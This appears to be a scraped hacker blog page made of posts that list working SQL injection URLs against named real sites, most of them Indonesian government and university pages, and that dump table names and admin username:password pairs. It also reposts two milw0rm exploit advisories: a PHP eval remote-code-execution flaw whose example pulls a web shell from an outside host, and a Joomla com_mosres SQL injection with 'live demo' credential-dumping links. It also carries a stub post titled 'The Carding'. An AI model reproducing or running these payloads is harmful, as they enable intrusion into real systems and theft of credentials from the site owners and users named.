exploit live cat

Posted on 10.10 by CS-31

http://www.kpujatim.go.id/news.php?id=116+order+by+15--
http://www.pelangi.or.id/news.php?hid=66+order+by+1--
http://www.organicindonesia.org/05infodata-news.php?id=139
http://www.d-infokom-jatim.go.id/news.php?id=685
http://kenduricinta.com/news.php?id=114
http://www.dprd-sidoarjo.info/news.php?id=197
http://www.dprd-sidoarjo.info/news.php?id=-197+order+by+1--
http://www.jcautosales.biz/jcauto/

http://www.purwakarta.go.id/bupati.php?temp&limit=410%27+order+by+1--
http://www.smk4-padang.sch.id/mod.php?mod=katalog&op=viewlink&cid=23%27+order+by+4--

http://www.eco1.upm.edu.my/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password)%20)%20),3%20from%20jos_users



http://www.arsip.banten.go.id/index.php?link=dtl&id=-4%20union%20select%201,2,3,4,concat(user(),char(58),version(),char(58),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

http://www.mui.or.id/mui_in/news.php?id=null+union+all+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database()--

http://www.nganjukkab.go.id/ina/ttg.php?id=-12%20union%20select%201,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--
http://www.simalungunkab.go.id/en/?id=-1+union+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables--

http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()/*

http://www.kkppi.go.id/baru/publikasi.php?mode=baca&pub_id=-5%20union%20all%20select%201,2,3,4,group_concat(table_name),6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--

http://www.trisakti.ac.id/fh/?page=guru_besar&ID=-4+AND+1=2+UNION+SELECT+0,1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()--

http://elink.dinkespurworejo.go.id/mod.php?mod=publisher&op=viewarticle&artid=-7%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--

http://www.pantau.or.id/detailtraining.php?id=-23+union+select+1,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables--

http://gerbang.jabar.go.id/kabbandung/index.php?index=16&idberita=-99999%20union%20select%201,unhex(hex(concat(char(58),0x3a,password))),3,4,5,6,7,8,9,10,11,12,13,14%20from%20member/*


tr

http://www.sosyalsorumluluk.org.tr/haberler.asp?ID=1%20union+select+0,username,2,3,4,5,password,7,8+from+admin

my

http://cmslib.uum.edu.my/psb/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password)%20)%20),3%20from%20jos_users

bug website

Posted on 10.00 by CS-31

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

- Vulnerable code in system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC :

http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example :

http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]

Joomla Component com_mosres

Posted on 10.39 by CS-31

==================================================================================
Joomla Component com_mosres (property_uid) SQL injection Vulnerability
==================================================================================



###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com

###################################################

Conditions : magic_quotes_gpc = Off
---------------------------------------------------
Example Joomla:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

Live Demo:
http://ahtopolbg.com/index.php?option=com_mosres&catID=1004&regID=2&task=viewproperty&property_uid=null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3Bi0s,6,7,8,9,10,11,12,13+from+jos_users/*

---------------------------------------------------
Example Mambo:
http://localHost/path/index.php?option=com_mosres&task=viewproperty&property_uid=[SQL code]

[SQL code]:
null'+and+1=2+union+select+1,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

Live Demo:
http://www.velingradbg.com/index.php?option=com_mosres&task=viewproperty&property_uid=1005%27%20and%201=2%20union%20select%201,2,3,4,concat(username,0x3a,password)ChipD3bi0s,6,7,8,9,10,11,12,13+from+mos_users/*

**************************
however, still looking ... component, can be injected in several places (not all or always).
Almost always SQL injection & also blind sql injection.
I let you work ;)

http://www.ahtopolbg.com/index.php?option=com_mosres&task=showregion&regID=4%27+and+1=2+union%20select%201,concat(username,0x3a,password)+from+jos_users/*&lang=bg

**************************


+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++




Mos Res
23/02/2005
Vince Wooll
This component is released under the GNU/GPL License
mosres@woollyinwales.co.uk
http://www.mosres.net
1.0f
Mambo Resident component for v4.5.2

# milw0rm.com [2009-06-03]

The Carding

Posted on 09.11 by CS-31

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.